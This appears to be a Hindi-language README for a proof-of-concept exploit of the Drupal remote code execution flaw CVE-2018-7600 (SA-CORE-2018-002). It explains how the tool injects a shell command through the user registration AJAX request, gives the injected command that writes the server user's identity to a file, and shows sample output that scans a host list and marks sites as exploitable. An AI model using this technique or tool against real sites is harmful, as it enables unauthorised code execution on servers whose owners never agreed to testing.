
Drupal CVE-2018-7600 / SA-CORE-2018-002 के लिए प्रूफ-ऑफ-कॉन्सेप्ट
Drupal 7.58 से पहले, 8.x 8.3.9 से पहले, 8.4.x 8.4.6 से पहले, और 8.5.x 8.5.1 से पहले के संस्करण दूरस्थ हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देते हैं, क्योंकि यह समस्या डिफ़ॉल्ट या सामान्य मॉड्यूल कॉन्फ़िगरेशन वाले कई सबसिस्टम को प्रभावित करती है।
यह drupal_ajax रैपर को एक पैकेट भेजता है ताकि एक उपयोगकर्ता को पंजीकृत किया जा सके। उपयोगकर्ता को exec मार्कअप का उपयोग करके bash चलाने की अनुमति देता है। यह PoC उपयोगकर्ता का नाम और आईडी abcde.txt में भेजता है।
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
http*://example.com/abcde.txt की जाँच करता है
[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text
%s = फ़ाइल का नाम
यूज़र आईडी, पीआईडी और ग्रुप पेलोड
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s